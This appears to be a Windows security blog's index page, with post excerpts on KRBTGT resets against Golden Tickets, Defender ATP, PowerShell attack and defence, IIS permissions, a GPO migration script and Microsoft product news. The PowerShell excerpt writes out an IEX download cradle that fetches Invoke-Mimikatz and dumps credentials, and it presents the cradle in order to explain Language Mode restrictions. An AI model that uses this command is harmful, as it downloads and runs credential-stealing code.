KRBTGT Account Password Reset – Security risk or operational risk?

February 15, 2018

Hi, KRBTGT is the Key Distribution Center Service Account, the object responsible for the core Kerberos service of Active Directory. Nowadays we are exposed to many cyber-attacks that involve querying and manipulating the KRBTGT account. A popular one is the Golden Ticket attack: once an attacker has obtained the KRBTGT account password hash, they can create Golden Tickets. It is important to understand that existing Golden Tickets are no longer valid after the KRBTGT password has been changed twice in rapid succession. This invalidates the existing tickets and removes the attacker's ability to create valid Golden Tickets with the KRBTGT hash they hold. KRBTGT Account...

Windows Security Center – Service Vulnerable on client

February 14, 2018

Hi, Microsoft has taken some steps against cyber-attacks in recent years. One of them was working out how to get detailed and complete information from the client to the cloud, with the ability to know which unusual actions were taking place on the client. Windows Defender Security Center has become the solution that manages the Windows Defender ATP client. The client deployment and management capabilities are among the highest I've come across, across all the distribution issues and the ability to disrupt that deployment. Signing the service with a certificate is the means Microsoft has chosen in order to prevent the user from interrupting or stopping...

PowerShell Offensive & Defensive View

February 12, 2018

Hi, as we know, PowerShell can be much more than a scripting platform once administrative rights are involved. Running unsigned processes and scripts lets the attacker advance another step towards achieving their objective. Mimikatz and other painful tools are detected by antivirus and anti-malware products, but when those are bypassed we are exposed to one of the most suspicious attacks in PowerShell today. Using an IEX download cradle to fetch a new file is one of them; simply upload the PS script and run the following:

"IEX (New-Object Net.WebClient).DownloadString('https://192.168.1.1/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

PowerShell can limit access to the above command by using Language Mode. FullLanguage - permits all language elements...

Differences – IIS 8.5 — IIS 7.5 – Permissions Field

November 30, 2016

Hey, in recent days I was handling an IIS permissions issue: while trying to send an HTTP request from an IIS application (Windows Server 2012 R2, IIS 8.5) I get a 401 Unauthorized exception (SSL client certificate authentication). When I try to simulate it on a different OS (2008 R2, IIS 7.5) I get 200 OK and everything goes as expected. After a little research we decided to grant local admin to the application pool user to check whether the scenario was related to a permissions field. And guess what? It works, as we verified - the application pool user identity needs...

Copy all GPOs from one forest to another

September 20, 2016

Hey, the following presents a PS script that copies all GPOs from one forest to another: back up all GPOs in one domain using Backup-GPO, then import them into the other forest using Import-GPO. Load the following modules before running the script:

Import-Module ActiveDirectory
Import-Module GroupPolicy

# Folder that holds the output of Backup-GPO (one {GUID} subfolder per GPO)
$sPath = "X:\GPOFOLDER"

# Only the backup subfolders; the folder also contains manifest.xml, which must be skipped
$list = Get-ChildItem -Path $sPath -Directory | Select-Object Name

foreach ($item in $list) {
    # Each backup folder carries a gpreport.xml whose root element is <GPO> with the policy's <Name>
    $fXML = Join-Path -Path $sPath -ChildPath ($item.Name + "\gpreport.xml")

    # Cast to [xml] so the GPO name can be read from the report; a plain Get-Content only returns text lines
    $XMLData = [xml](Get-Content -Path $fXML)
    $GPOName = $XMLData.GPO.Name

    # The folder name is the backup ID; -CreateIfNeeded creates the GPO in the target domain if it does not exist
    Import-GPO -BackupId $item.Name -TargetName $GPOName -Path $sPath -CreateIfNeeded
}

Azure Security Center Overview

March 28, 2016

Hey, with Azure Security Center you get a central view of the security state of all of your Azure resources. At a glance, verify that the appropriate security controls are in place and configured correctly. Scott talks to Sara Fender, who explains it all:

Azure Security Center Overview

Microsoft Security Critical Bulletin Release for March 2016

March 9, 2016

Hey, Microsoft Security Critical Bulletin Release for March 2016:

Bulletin Title
MS16-028 Security Update for Microsoft Windows PDF Library to Address Remote Code Execution
MS16-027 Security Update for Windows Media to Address Remote Code Execution
MS16-026 Security Update for Graphic Fonts to Address Remote Code Execution
MS16-024 Cumulative Security Update for Microsoft Edge
MS16-023 Cumulative Security Update for Internet Explorer
MS16-022 Security Update for Adobe Flash Player

Announcing Windows Defender Advanced Threat Protection

March 1, 2016

Hey, today Microsoft announced the next step in its efforts to protect enterprise customers with a new service, Windows Defender Advanced Threat Protection. Windows Defender Advanced Threat Protection is powered by a combination of Windows behavioral sensors, cloud-based security analytics, threat intelligence, and by tapping into Microsoft's intelligent security graph. This immense security graph provides big-data security analytics that look across aggregate behaviors to identify anomalies, informed by anonymous information from over 1 billion Windows devices, 2.5 trillion indexed URLs on the Web, 600 million reputation look-ups online, and over 1 million suspicious files detonated every day.

Read More

A complete solution for monitoring and protecting enterprise cloud apps

February 28, 2016

Hey, Microsoft has a strong, ongoing commitment to helping customers stay safe in a world with ever-increasing threats from cyber criminals. As Satya announced last year and Microsoft's Chief Information Security Officer (CISO) reiterated today, Microsoft is making huge investments to help its customers stay secure.

Microsoft is excited to announce a new set of security solutions, Microsoft Cloud App Security and Azure AD Identity Protection, that together give you a complete solution for monitoring and protecting enterprise cloud apps.

ITP Read More: a complete solution for monitoring and protecting enterprise cloud apps